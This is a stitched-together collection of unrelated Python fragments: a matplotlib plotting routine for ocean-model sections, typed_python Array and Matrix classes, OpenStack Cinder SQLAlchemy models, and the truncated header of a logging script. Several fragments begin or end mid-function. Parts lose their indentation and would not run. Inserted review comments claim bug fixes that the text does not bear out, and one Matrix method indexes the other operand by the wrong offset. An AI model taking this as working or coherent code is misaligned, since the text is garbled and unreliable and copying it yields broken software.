  sMin, sMax, sMean, sStd, sRMS = myStats(maskedField, None, debug=debug)
  tLims = numpy.amin(tCoord), numpy.amax(tCoord)
  zLims = numpy.amin(zCoord), numpy.amax(zCoord)
  #zLims = boundaryStats(zCoord)

  # Choose colormap and color levels
  if nbins is None and (clim is None or len(clim)==2): nbins=35
  if colormap is None: colormap = chooseColorMap(sMin, sMax)
  cmap, norm, extend = chooseColorLevels(sMin, sMax, colormap, clim=clim, nbins=nbins, extend=extend, autocenter=autocenter)

  if axis is None:
    # no axis supplied: size a fresh figure and draw into the current axes
    setFigureSize(aspect, resolution, debug=debug)
    #plt.gcf().subplots_adjust(left=.10, right=.99, wspace=0, bottom=.09, top=.9, hspace=0)
    axis = plt.gca()
  cs = axis.pcolormesh(tCoord, zCoord, field2, cmap=cmap, norm=norm)
  if interactive: addStatusBar(tCoord, zCoord, field2)
  cb = plt.colorbar(cs, ax=axis, fraction=.08, pad=0.02, extend=extend)
  if contour:
    matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
    # NOTE(review): Axes.contour documents 'linewidths', not 'lw' -- confirm
    # the matplotlib version in use accepts this keyword
    cs = axis.contour(tCoord, zCoord,field2,colors='k',lw=0.50)
    axis.clabel(cs,inline=1, fontsize=10)
  if centerlabels and len(clim)>2: cb.set_ticks( 0.5*(clim[:-1]+clim[1:]) )
  axis.set_facecolor(landcolor)
  if splitscale is not None:
    # dashed guide lines at interior split depths, then a piecewise y scale
    for zzz in splitscale[1:-1]: plt.axhline(zzz,color='k',linestyle='--')
    axis.set_yscale('splitscale', zval=splitscale)
  axis.set_xlim( tLims ); axis.set_ylim( zLims )
  # Annotate statistics: max/min at top-left, mean/rms and sd at top-right
  axis.annotate('max=%.5g\nmin=%.5g'%(sMax,sMin), xy=(0.0,1.01), xycoords='axes fraction', verticalalignment='bottom', fontsize=12)
  if sMean is not None:
    axis.annotate('mean=%.5g\nrms=%.5g'%(sMean,sRMS), xy=(1.0,1.01), xycoords='axes fraction', verticalalignment='bottom', horizontalalignment='right', fontsize=12)
    axis.annotate(' sd=%.5g\n'%(sStd), xy=(1.0,1.01), xycoords='axes fraction', verticalalignment='bottom', horizontalalignment='left', fontsize=12)
  if len(tlabel+tunits)>0: axis.set_xlabel(label(tlabel, tunits), fontsize=16)
  if len(zlabel+zunits)>0: axis.set_ylabel(label(zlabel, zunits), fontsize=16)
  if len(title)>0: axis.set_title(title)
  if len(suptitle)>0: plt.suptitle(suptitle)
  if splitscale is not None:
    # presumably 'splitscale' depths are given positive-down -- verify
    axis.invert_yaxis()
  if save is not None: plt.savefig(save)
  if interactive: addInteractiveCallbacks()
  if show: plt.show(block=False)
def chooseColorMap(sMin, sMax, difference=None):
  """
  Based on the min/max extremes of the data, choose a colormap that fits the data.

  Arguments:
  sMin        Minimum value of the data.
  sMax        Maximum value of the data.
  difference  Set True when the data is a difference (A-B) field, forcing
              the diverging map. Default None.

  Returns a colormap name: 'dunnePM' (diverging) when plotting a
  difference field or when the data straddles zero, otherwise
  'dunneRainbow' (sequential).
  """
  if difference:  # idiomatic truth test instead of '== True'
    return 'dunnePM'
  elif sMin<0 and sMax>0:
    return 'dunnePM'
  #elif sMax>0 and sMin<0.1*sMax: return 'hot'
  #elif sMin<0 and sMax>0.1*sMin: return 'hot_r'
  else:
    return 'dunneRainbow'
def chooseColorLevels(sMin, sMax, colorMapName, clim=None, nbins=None, steps=[1,2,2.5,5,10], extend=None, logscale=False, autocenter=False):
"""
If nbins is a positive integer, choose sensible color levels with nbins colors.
If clim is a 2-element tuple, create color levels within the clim range
or if clim is a vector, use clim as contour levels.
If clim provides more than 2 color interfaces, nbins must be absent.
If clim is absent, the sMin,sMax are used as the color range bounds.
If autocenter is True and clim is None then the automatic color levels are centered.
Returns cmap, norm and extend.
"""
if nbins is None and clim is None: raise Exception('At least one of clim or nbins is required.')
if clim is not None:
if len(clim)<2: raise Exception('clim must be at least 2 values long.')
if nbins is None and len(clim)==2: raise Exception('nbins must be provided when clims specifies a color range.')
if nbins is not None and len(clim)>2: raise Exception('nbins cannot be provided when clims specifies color levels.')
if clim is None:
if autocenter:
levels | |
# Source repository: APrioriInvestments/typed_python
# Copyright 2017-2020 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from typed_python import (
Class, Member, ListOf, Final, TypeFunction, Tuple, Float32, Int32, NotCompiled,
Entrypoint
)
from typed_python.array.fortran import axpy, gemv, gemm, getri, getrf
def min(a, b):
    """Return the smaller of *a* and *b* (returns *b* on a tie).

    NOTE(review): this deliberately shadows the builtin ``min`` within this
    module -- presumably to give the typed_python compiler a simple
    two-argument form; confirm before renaming.
    """
    if a < b:
        return a
    return b
@TypeFunction
def Array(T):
    """Implements a simple, strongly typed array."""
    class Array_(Class, Final):
        """A 1-d strided view over a ListOf(T) buffer.

        The view is described by an offset into the buffer, a stride
        between consecutive elements, and a shape (element count), so
        arrays can alias storage without copying.
        """
        _vals = Member(ListOf(T))    # backing storage
        _offset = Member(int)        # buffer index of element 0
        _stride = Member(int)        # buffer-slot distance between elements
        _shape = Member(int)         # number of elements in the view

        dimensions = 1
        ElementType = T

        def __init__(self, vals):
            # copy-construct a canonical (contiguous, zero-offset) array
            self._vals = ListOf(T)(vals)
            self._offset = 0
            self._stride = 1
            self._shape = len(vals)

        def __init__(self, vals, offset, stride, shape):  # noqa
            # view-construct: alias an existing buffer without copying
            self._vals = vals
            self._offset = offset
            self._stride = stride
            self._shape = shape

        def __init__(self):  # noqa
            # empty array
            self._vals = ListOf(T)()
            self._offset = 0
            self._stride = 1
            self._shape = 0

        @property
        def shape(self):
            return Tuple(int)((self._shape,))

        def __len__(self):
            return self._shape

        def isCanonical(self):
            """True if the view is the whole buffer, contiguous, from index 0."""
            return self._offset == 0 and self._stride == 1 and self._shape == len(self._vals)

        ##################################################################
        # Operators
        # these are repeated below for 'matrix' because we don't have a
        # good way of doing class mixins yet.
        def __add__(self, other):
            self._inplaceBinopCheck(other)
            res = self.clone()
            res += other
            return res

        def __iadd__(self, other):
            self._inplaceBinopCheck(other)
            if (T is float or T is Float32) and isinstance(other, Array(T)):
                # BLAS fast path: self = 1.0 * other + self.
                # axpy is (n, alpha, x, incx, y, incy): the increment for
                # 'other' (x) is other._stride and for 'self' (y) is
                # self._stride.  The two strides were previously swapped,
                # which gave wrong results for unequal, non-unit strides.
                p = self._vals.pointerUnsafe(self._offset)
                p2 = other._vals.pointerUnsafe(other._offset)
                axpy(self._shape, 1.0, p2, other._stride, p, self._stride)
            else:
                self._inplaceBinop(other, lambda a, b: a + b)
            return self

        def __mul__(self, other):
            self._inplaceBinopCheck(other)
            res = self.clone()
            res._inplaceBinop(other, lambda a, b: a * b)
            return res

        def __imul__(self, other):
            self._inplaceBinopCheck(other)
            self._inplaceBinop(other, lambda a, b: a * b)
            return self

        def __truediv__(self, other):
            self._inplaceBinopCheck(other)
            res = self.clone()
            res._inplaceBinop(other, lambda a, b: a / b)
            return res

        def __itruediv__(self, other):
            self._inplaceBinopCheck(other)
            self._inplaceBinop(other, lambda a, b: a / b)
            return self

        def __floordiv__(self, other):
            self._inplaceBinopCheck(other)
            res = self.clone()
            res._inplaceBinop(other, lambda a, b: a // b)
            return res

        def __ifloordiv__(self, other):
            self._inplaceBinopCheck(other)
            self._inplaceBinop(other, lambda a, b: a // b)
            return self

        def __sub__(self, other):
            self._inplaceBinopCheck(other)
            res = self.clone()
            res._inplaceBinop(other, lambda a, b: a - b)
            return res

        def __isub__(self, other):
            self._inplaceBinopCheck(other)
            self._inplaceBinop(other, lambda a, b: a - b)
            return self

        def abs(self):
            """Return a new array with the elementwise absolute value."""
            self = self.clone()
            self._inplaceUnaryOp(lambda a: -a if a < 0 else a)
            return self

        def __pow__(self, p):
            self = self.clone()
            self._inplaceUnaryOp(lambda a: a ** p)
            return self

        def log(self):
            self = self.clone()
            self._inplaceUnaryOp(lambda a: math.log(a))
            return self

        def cos(self):
            self = self.clone()
            self._inplaceUnaryOp(lambda a: math.cos(a))
            return self

        def sin(self):
            self = self.clone()
            self._inplaceUnaryOp(lambda a: math.sin(a))
            return self

        def tanh(self):
            self = self.clone()
            self._inplaceUnaryOp(lambda a: math.tanh(a))
            return self

        def __neg__(self):
            self = self.clone()
            self._inplaceUnaryOp(lambda a: -a)
            return self

        def __pos__(self):
            return self.clone()

        # operators
        #########################################
        @Entrypoint
        def __matmul__(self, other: Array(T)) -> T:  # noqa
            """Dot product with another array of the same shape."""
            if other.shape != self.shape:
                raise Exception(f"Mismatched array sizes: {self.shape} != {other.shape}")
            res = T()
            ownStride = self._stride
            otherStride = other._stride
            ownP = self._vals.pointerUnsafe(self._offset)
            otherP = other._vals.pointerUnsafe(other._offset)
            for i in range(self._shape):
                res += ownP.get() * otherP.get()
                ownP += ownStride
                otherP += otherStride
            return res

        def __matmul__(self, other: Matrix(T)) -> Array(T):  # noqa
            # vector @ matrix: delegate to the matrix's right-multiply
            return other.__rmatmul__(self)

        @Entrypoint
        def _inplaceBinopCheck(self, other: T):
            # scalar operand: always compatible
            pass

        @Entrypoint  # noqa
        def _inplaceBinopCheck(self, other: Array(T)):  # noqa
            if other._shape != self._shape:
                raise Exception("Mismatched array sizes.")

        @Entrypoint
        def _inplaceBinop(self, other: Array(T), binaryFunc):
            """Apply binaryFunc(self[i], other[i]) into self, elementwise."""
            p = self._vals.pointerUnsafe(self._offset)
            p2 = other._vals.pointerUnsafe(other._offset)
            for i in range(self._shape):
                (p + i * self._stride).set(binaryFunc(
                    (p + i * self._stride).get(),
                    (p2 + i * other._stride).get()
                ))
            return self

        @Entrypoint
        def _inplaceUnaryOp(self, f):
            """Apply f(self[i]) into self, elementwise."""
            p = self._vals.pointerUnsafe(self._offset)
            for i in range(self._shape):
                p.set(f(p.get()))
                p += self._stride

        @Entrypoint  # noqa
        def _inplaceBinop(self, other: T, binaryFunc):  # noqa
            """Apply binaryFunc(self[i], scalar) into self, elementwise."""
            p = self._vals.pointerUnsafe(self._offset)
            for i in range(self._shape):
                (p + i * self._stride).set(binaryFunc((p + i * self._stride).get(), other))
            return self

        @Entrypoint
        def clone(self):
            """Return a canonical (contiguous) deep copy of this array."""
            return Array(T)(self.toList())

        @Entrypoint
        def toList(self):
            """Copy the view's elements into a fresh, contiguous ListOf(T)."""
            newVals = ListOf(T)()
            newVals.reserve(self._shape)
            pWrite = newVals.pointerUnsafe(0)
            pRead = self._vals.pointerUnsafe(self._offset)
            for i in range(self._shape):
                pWrite.set(pRead.get())
                pWrite += 1
                pRead += self._stride
            newVals.setSizeUnsafe(self._shape)
            return newVals

        @Entrypoint
        @staticmethod
        def full(count: int, value: T):
            """Return a new array of 'count' copies of 'value'."""
            if count < 0:
                raise Exception("Can't have a negative array size.")
            res = ListOf(T)()
            res.resize(count, value)
            return Array(T)(res)

        @Entrypoint
        def sum(self):
            res = T()
            pRead = self._vals.pointerUnsafe(self._offset)
            for i in range(self._shape):
                res += pRead.get()
                pRead += self._stride
            return res

        @staticmethod
        def ones(count):
            return Array_.full(count, 1.0)

        @staticmethod
        def zeros(count):
            return Array_.full(count, 0.0)

        def get(self, i):
            # unchecked element access
            return self._vals[i * self._stride + self._offset]

        def set(self, i, value):
            # unchecked element assignment
            self._vals[i * self._stride + self._offset] = value

        def __getitem__(self, i):
            if i < 0 or i >= self._shape:
                raise IndexError(f"Index {i} is out of bounds [0, {self._shape})")
            return self._vals[i * self._stride + self._offset]

        def __setitem__(self, i, val):
            if i < 0 or i >= self._shape:
                raise IndexError(f"Index {i} is out of bounds [0, {self._shape})")
            self._vals[i * self._stride + self._offset] = val

        def __repr__(self):
            # show at most ~22 leading elements, then elide
            items = ListOf(str)()
            for i in range(self._shape):
                items.append(str(self[i]))
                if i > 20:
                    items.append("...")
                    break
            return f"Array({T.__name__})([" + ", ".join(items) + "])"

        def __str__(self):
            return repr(self)

    return Array_
@TypeFunction
def Matrix(T):
class Matrix_(Class, Final):
_vals = Member(ListOf(T))
# rows, then columns
_shape = Member(Tuple(int, int))
_offset = Member(int)
_stride = Member(Tuple(int, int))
dimensions = 2
def __init__(self, vals, offset, stride, shape):
self._vals = ListOf(T)(vals)
self._offset = offset
self._stride = stride
self._shape = shape
def __init__(self): # noqa
self._vals = ListOf(T)()
self._shape = Tuple(int, int)((0, 0))
self._stride = Tuple(int, int)((0, 1))
self._offset = 0
@property
def _flatShape(self):
return self._shape[0] * self._shape[1]
@property
def shape(self):
return self._shape
##################################################################
# Operators
def __add__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a + b)
return res
def __iadd__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a + b)
return self
def __mul__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a * b)
return res
def __imul__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a * b)
return self
def __truediv__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a / b)
return res
def __itruediv__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a / b)
return self
def __floordiv__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a // b)
return res
def __ifloordiv__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a // b)
return self
def __sub__(self, other):
self._inplaceBinopCheck(other)
res = self.clone()
res._inplaceBinop(other, lambda a, b: a - b)
return res
def __isub__(self, other):
self._inplaceBinopCheck(other)
self._inplaceBinop(other, lambda a, b: a - b)
return self
def abs(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: -a if a < 0 else a)
return self
def __pow__(self, p):
self = self.clone()
self._inplaceUnaryOp(lambda a: a ** p)
return self
def log(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.log(a))
return self
def cos(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.cos(a))
return self
def sin(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.sin(a))
return self
def tanh(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: math.tanh(a))
return self
def __neg__(self):
self = self.clone()
self._inplaceUnaryOp(lambda a: -a)
return self
def __pos__(self):
return self.clone()
# operators
#########################################
@Entrypoint
def _inplaceBinopCheck(self, other: T) -> None:
pass
@Entrypoint # noqa
def _inplaceBinopCheck(self, other: Matrix(T)) -> None: # noqa
if other.shape[0] != self.shape[0]:
raise Exception("Mismatched array sizes.")
if other.shape[1] != self.shape[1]:
raise Exception("Mismatched array sizes.")
@Entrypoint
def _inplaceBinop(self, other: Matrix(T), binaryFunc):
pSelf = self._vals.pointerUnsafe(self._offset)
pOther = other._vals.pointerUnsafe(self._offset)
for i0 in range(self._shape[0]):
for i1 in range(self._shape[1]):
(pSelf + i1 * self._stride[1]).set(
binaryFunc(
(pSelf + i1 * self._stride[1]).get(),
(pOther + i1 * other._stride[1]).get()
)
)
pSelf += self._stride[0]
pOther += other._stride[0]
return self
@Entrypoint # noqa
def _inplaceBinop(self, other: T, binaryFunc): # noqa
pSelf = self._vals.pointerUnsafe(self._offset)
for i0 in range(self._shape[0]):
for i1 in range(self._shape[1]):
(pSelf + i1 * self._stride[1]).set(
binaryFunc(
(pSelf + i1 * self._stride[1]).get(),
other
)
)
pSelf += self._stride[0]
return self
def _inplaceUnaryOp(self, f):
p | |
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for cinder data.
"""
from oslo_config import cfg
from oslo_db.sqlalchemy import models
from oslo_utils import timeutils
from sqlalchemy import Column, Integer, String, Text, schema
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import ForeignKey, DateTime, Boolean
from sqlalchemy.orm import relationship, backref, validates
CONF = cfg.CONF
BASE = declarative_base()
class CinderBase(models.TimestampMixin,
                 models.ModelBase):
    """Base class for Cinder Models.

    Adds soft-delete bookkeeping: rows are flagged deleted rather than
    physically removed.
    """
    __table_args__ = {'mysql_engine': 'InnoDB'}
    # TODO(rpodolyaka): reuse models.SoftDeleteMixin in the next stage
    # of implementing of BP db-cleanup
    deleted_at = Column(DateTime)
    deleted = Column(Boolean, default=False)
    # NOTE(review): shadows SQLAlchemy's declarative `metadata` attribute,
    # presumably so subclasses can define their own `metadata` relations
    # (e.g. volume_metadata backrefs) -- confirm.
    metadata = None
    def delete(self, session):
        """Soft-delete this object: set the flags and persist via session."""
        self.deleted = True
        self.deleted_at = timeutils.utcnow()
        self.save(session=session)
class Service(BASE, CinderBase):
    """Represents a running service on a host (e.g. cinder-volume)."""
    __tablename__ = 'services'
    id = Column(Integer, primary_key=True)
    host = Column(String(255))  # , ForeignKey('hosts.id'))
    binary = Column(String(255))
    topic = Column(String(255))
    # Number of liveness reports; incremented by the service heartbeat.
    report_count = Column(Integer, nullable=False, default=0)
    disabled = Column(Boolean, default=False)
    availability_zone = Column(String(255), default='cinder')
    disabled_reason = Column(String(255))
class ConsistencyGroup(BASE, CinderBase):
    """Represents a consistencygroup (a set of volumes snapshotted together)."""
    __tablename__ = 'consistencygroups'
    # UUID primary key
    id = Column(String(36), primary_key=True)
    user_id = Column(String(255), nullable=False)
    project_id = Column(String(255), nullable=False)
    host = Column(String(255))
    availability_zone = Column(String(255))
    name = Column(String(255))
    description = Column(String(255))
    volume_type_id = Column(String(255))
    status = Column(String(255))
class Cgsnapshot(BASE, CinderBase):
    """Represents a cgsnapshot (a snapshot of a consistency group)."""
    __tablename__ = 'cgsnapshots'
    id = Column(String(36), primary_key=True)
    consistencygroup_id = Column(String(36))
    user_id = Column(String(255), nullable=False)
    project_id = Column(String(255), nullable=False)
    name = Column(String(255))
    description = Column(String(255))
    status = Column(String(255))
    # Owning group; join is spelled out because consistencygroup_id has no
    # ForeignKey constraint on it.
    consistencygroup = relationship(
        ConsistencyGroup,
        backref="cgsnapshots",
        foreign_keys=consistencygroup_id,
        primaryjoin='Cgsnapshot.consistencygroup_id == ConsistencyGroup.id')
class Volume(BASE, CinderBase):
    """Represents a block storage device that can be attached to a vm."""
    __tablename__ = 'volumes'
    id = Column(String(36), primary_key=True)
    _name_id = Column(String(36))  # Don't access/modify this directly!
    @property
    def name_id(self):
        """Effective name id: _name_id override when set, else the PK."""
        return self.id if not self._name_id else self._name_id
    @name_id.setter
    def name_id(self, value):
        self._name_id = value
    @property
    def name(self):
        """Display name derived from CONF.volume_name_template."""
        return CONF.volume_name_template % self.name_id
    ec2_id = Column(Integer)
    user_id = Column(String(255))
    project_id = Column(String(255))
    snapshot_id = Column(String(36))
    host = Column(String(255))  # , ForeignKey('hosts.id'))
    # Size in GiB (units not declared here -- inferred from cinder
    # conventions; confirm at call sites).
    size = Column(Integer)
    availability_zone = Column(String(255))  # TODO(vish): foreign key?
    instance_uuid = Column(String(36))
    attached_host = Column(String(255))
    mountpoint = Column(String(255))
    attach_time = Column(String(255))  # TODO(vish): datetime
    status = Column(String(255))  # TODO(vish): enum?
    attach_status = Column(String(255))  # TODO(vish): enum
    migration_status = Column(String(255))
    scheduled_at = Column(DateTime)
    launched_at = Column(DateTime)
    terminated_at = Column(DateTime)
    display_name = Column(String(255))
    display_description = Column(String(255))
    # Backend-driver specific bookkeeping.
    provider_location = Column(String(255))
    provider_auth = Column(String(255))
    provider_geometry = Column(String(255))
    provider_id = Column(String(255))
    volume_type_id = Column(String(36))
    source_volid = Column(String(36))
    encryption_key_id = Column(String(36))
    consistencygroup_id = Column(String(36))
    deleted = Column(Boolean, default=False)
    bootable = Column(Boolean, default=False)
    replication_status = Column(String(255))
    replication_extended_status = Column(String(255))
    replication_driver_data = Column(String(255))
    # Owning consistency group; explicit join since there is no FK.
    consistencygroup = relationship(
        ConsistencyGroup,
        backref="volumes",
        foreign_keys=consistencygroup_id,
        primaryjoin='Volume.consistencygroup_id == ConsistencyGroup.id')
class VolumeMetadata(BASE, CinderBase):
    """Represents a metadata key/value pair for a volume."""
    __tablename__ = 'volume_metadata'
    id = Column(Integer, primary_key=True)
    key = Column(String(255))
    value = Column(String(255))
    volume_id = Column(String(36), ForeignKey('volumes.id'), nullable=False)
    # Join filters out soft-deleted metadata rows.
    volume = relationship(Volume, backref="volume_metadata",
                          foreign_keys=volume_id,
                          primaryjoin='and_('
                          'VolumeMetadata.volume_id == Volume.id,'
                          'VolumeMetadata.deleted == False)')
class VolumeAdminMetadata(BASE, CinderBase):
    """Represents an administrator metadata key/value pair for a volume."""
    __tablename__ = 'volume_admin_metadata'
    id = Column(Integer, primary_key=True)
    key = Column(String(255))
    value = Column(String(255))
    volume_id = Column(String(36), ForeignKey('volumes.id'), nullable=False)
    # Join filters out soft-deleted metadata rows.
    volume = relationship(Volume, backref="volume_admin_metadata",
                          foreign_keys=volume_id,
                          primaryjoin='and_('
                          'VolumeAdminMetadata.volume_id == Volume.id,'
                          'VolumeAdminMetadata.deleted == False)')
class VolumeTypes(BASE, CinderBase):
    """Represent possible volume_types of volumes offered."""
    __tablename__ = "volume_types"
    id = Column(String(36), primary_key=True)
    name = Column(String(255))
    description = Column(String(255))
    # A reference to qos_specs entity
    qos_specs_id = Column(String(36),
                          ForeignKey('quality_of_service_specs.id'))
    is_public = Column(Boolean, default=True)
    # All non-deleted volumes of this type; each volume gains a scalar
    # `volume_type` backref.
    volumes = relationship(Volume,
                           backref=backref('volume_type', uselist=False),
                           foreign_keys=id,
                           primaryjoin='and_('
                           'Volume.volume_type_id == VolumeTypes.id, '
                           'VolumeTypes.deleted == False)')
class VolumeTypeProjects(BASE, CinderBase):
    """Represent projects associated volume_types.

    Used for private volume types: a row grants `project_id` access to
    `volume_type_id`.
    """
    __tablename__ = "volume_type_projects"
    __table_args__ = (schema.UniqueConstraint(
        "volume_type_id", "project_id", "deleted",
        name="uniq_volume_type_projects0volume_type_id0project_id0deleted"),
    )
    id = Column(Integer, primary_key=True)
    # BUG FIX: volume_types.id is a String(36) UUID (see VolumeTypes);
    # declaring this foreign key as Integer mismatched the referenced
    # column's type.
    volume_type_id = Column(String(36), ForeignKey('volume_types.id'),
                            nullable=False)
    project_id = Column(String(255))
    # Join filters out soft-deleted association rows.
    volume_type = relationship(
        VolumeTypes,
        backref="projects",
        foreign_keys=volume_type_id,
        primaryjoin='and_('
                    'VolumeTypeProjects.volume_type_id == VolumeTypes.id,'
                    'VolumeTypeProjects.deleted == False)')
class VolumeTypeExtraSpecs(BASE, CinderBase):
    """Represents additional specs as key/value pairs for a volume_type."""
    __tablename__ = 'volume_type_extra_specs'
    id = Column(Integer, primary_key=True)
    key = Column(String(255))
    value = Column(String(255))
    volume_type_id = Column(String(36),
                            ForeignKey('volume_types.id'),
                            nullable=False)
    # Join filters out soft-deleted spec rows.
    volume_type = relationship(
        VolumeTypes,
        backref="extra_specs",
        foreign_keys=volume_type_id,
        primaryjoin='and_('
        'VolumeTypeExtraSpecs.volume_type_id == VolumeTypes.id,'
        'VolumeTypeExtraSpecs.deleted == False)'
    )
class QualityOfServiceSpecs(BASE, CinderBase):
    """Represents QoS specs as key/value pairs.
    QoS specs is standalone entity that can be associated/disassociated
    with volume types (one to many relation). Adjacency list relationship
    pattern is used in this model in order to represent following hierarchical
    data with in flat table, e.g, following structure
    qos-specs-1  'Rate-Limit'
         |
         +------>  consumer = 'front-end'
         +------>  total_bytes_sec = 1048576
         +------>  total_iops_sec = 500
    qos-specs-2  'QoS_Level1'
         |
         +------>  consumer = 'back-end'
         +------>  max-iops =  1000
         +------>  min-iops = 200
    is represented by:
      id       specs_id       key                  value
    ------     --------   -------------            -----
    UUID-1     NULL       QoSSpec_Name           Rate-Limit
    UUID-2     UUID-1       consumer             front-end
    UUID-3     UUID-1     total_bytes_sec        1048576
    UUID-4     UUID-1     total_iops_sec           500
    UUID-5     NULL       QoSSpec_Name           QoS_Level1
    UUID-6     UUID-5       consumer             back-end
    UUID-7     UUID-5       max-iops               1000
    UUID-8     UUID-5       min-iops               200
    """
    __tablename__ = 'quality_of_service_specs'
    id = Column(String(36), primary_key=True)
    # Self-referential FK: NULL marks a spec-group root row.
    specs_id = Column(String(36), ForeignKey(id))
    key = Column(String(255))
    value = Column(String(255))
    # Child key/value rows of a root spec; deleting the root removes them.
    specs = relationship(
        "QualityOfServiceSpecs",
        cascade="all, delete-orphan",
        backref=backref("qos_spec", remote_side=id),
    )
    # Volume types referencing this spec either by root id or by child id.
    vol_types = relationship(
        VolumeTypes,
        backref=backref('qos_specs'),
        foreign_keys=id,
        primaryjoin='and_('
                    'or_(VolumeTypes.qos_specs_id == '
                    'QualityOfServiceSpecs.id,'
                    'VolumeTypes.qos_specs_id == '
                    'QualityOfServiceSpecs.specs_id),'
                    'QualityOfServiceSpecs.deleted == False)')
class VolumeGlanceMetadata(BASE, CinderBase):
    """Glance metadata for a bootable volume."""
    __tablename__ = 'volume_glance_metadata'
    id = Column(Integer, primary_key=True, nullable=False)
    volume_id = Column(String(36), ForeignKey('volumes.id'))
    snapshot_id = Column(String(36), ForeignKey('snapshots.id'))
    key = Column(String(255))
    value = Column(Text)
    # Join filters out soft-deleted metadata rows.
    volume = relationship(Volume, backref="volume_glance_metadata",
                          foreign_keys=volume_id,
                          primaryjoin='and_('
                          'VolumeGlanceMetadata.volume_id == Volume.id,'
                          'VolumeGlanceMetadata.deleted == False)')
class Quota(BASE, CinderBase):
    """Represents a single quota override for a project.
    If there is no row for a given project id and resource, then the
    default for the quota class is used.  If there is no row for a
    given quota class and resource, then the default for the
    deployment is used. If the row is present but the hard limit is
    Null, then the resource is unlimited.
    """
    __tablename__ = 'quotas'
    id = Column(Integer, primary_key=True)
    project_id = Column(String(255), index=True)
    resource = Column(String(255))
    # NULL => unlimited (see docstring).
    hard_limit = Column(Integer, nullable=True)
class QuotaClass(BASE, CinderBase):
    """Represents a single quota override for a quota class.
    If there is no row for a given quota class and resource, then the
    default for the deployment is used.  If the row is present but the
    hard limit is Null, then the resource is unlimited.
    """
    __tablename__ = 'quota_classes'
    id = Column(Integer, primary_key=True)
    class_name = Column(String(255), index=True)
    resource = Column(String(255))
    # NULL => unlimited (see docstring).
    hard_limit = Column(Integer, nullable=True)
class QuotaUsage(BASE, CinderBase):
    """Represents the current usage for a given resource."""
    __tablename__ = 'quota_usages'
    id = Column(Integer, primary_key=True)
    project_id = Column(String(255), index=True)
    resource = Column(String(255))
    in_use = Column(Integer)
    reserved = Column(Integer)
    @property
    def total(self):
        """Committed plus reserved usage for quota accounting."""
        return self.in_use + self.reserved
    until_refresh = Column(Integer, nullable=True)
class Reservation(BASE, CinderBase):
    """Represents a resource reservation for quotas."""
    __tablename__ = 'reservations'
    id = Column(Integer, primary_key=True)
    uuid = Column(String(36), nullable=False)
    usage_id = Column(Integer, ForeignKey('quota_usages.id'), nullable=False)
    project_id = Column(String(255), index=True)
    resource = Column(String(255))
    delta = Column(Integer)
    expire = Column(DateTime, nullable=False)
    # NOTE(review): this join compares deleted == 0 while the sibling models
    # compare deleted == False; both match an un-deleted Boolean column but
    # the inconsistency looks accidental -- confirm before unifying.
    usage = relationship(
        "QuotaUsage",
        foreign_keys=usage_id,
        primaryjoin='and_(Reservation.usage_id == QuotaUsage.id,'
                    'QuotaUsage.deleted == 0)')
class Snapshot(BASE, CinderBase):
    """Represents a snapshot of volume."""
    __tablename__ = 'snapshots'
    id = Column(String(36), primary_key=True)
    @property
    def name(self):
        """Display name derived from CONF.snapshot_name_template."""
        return CONF.snapshot_name_template % self.id
    @property
    def volume_name(self):
        """Name of the parent volume (delegates to the relationship)."""
        return self.volume.name  # pylint: disable=E1101
    user_id = Column(String(255))
    project_id = Column(String(255))
    volume_id = Column(String(36))
    cgsnapshot_id = Column(String(36))
    status = Column(String(255))
    progress = Column(String(255))
    volume_size = Column(Integer)
    display_name = Column(String(255))
    display_description = Column(String(255))
    encryption_key_id = Column(String(36))
    volume_type_id = Column(String(36))
    # Backend-driver specific bookkeeping.
    provider_location = Column(String(255))
    provider_id = Column(String(255))
    # Explicit joins since volume_id / cgsnapshot_id carry no FK constraint.
    volume = relationship(Volume, backref="snapshots",
                          foreign_keys=volume_id,
                          primaryjoin='Snapshot.volume_id == Volume.id')
    cgsnapshot = relationship(
        Cgsnapshot,
        backref="snapshots",
        foreign_keys=cgsnapshot_id,
        primaryjoin='Snapshot.cgsnapshot_id == Cgsnapshot.id')
class SnapshotMetadata(BASE, CinderBase):
"""Represents a metadata key/value pair for a snapshot."""
__tablename__ = 'snapshot_metadata'
id = Column(Integer, primary_key=True)
key = Column(String(255))
value = Column(String(255))
snapshot_id = Column(String(36),
ForeignKey('snapshots.id'),
nullable=False)
snapshot = relationship(Snapshot, backref="snapshot_metadata",
| |
# coding: utf-8
import os
import json
import time
import socket
import random
import logging
import requests
from log import Log
# (translated) This basicConfig call was intended to let logging.info also
# print to the console; note that at level=WARN, INFO records are in fact
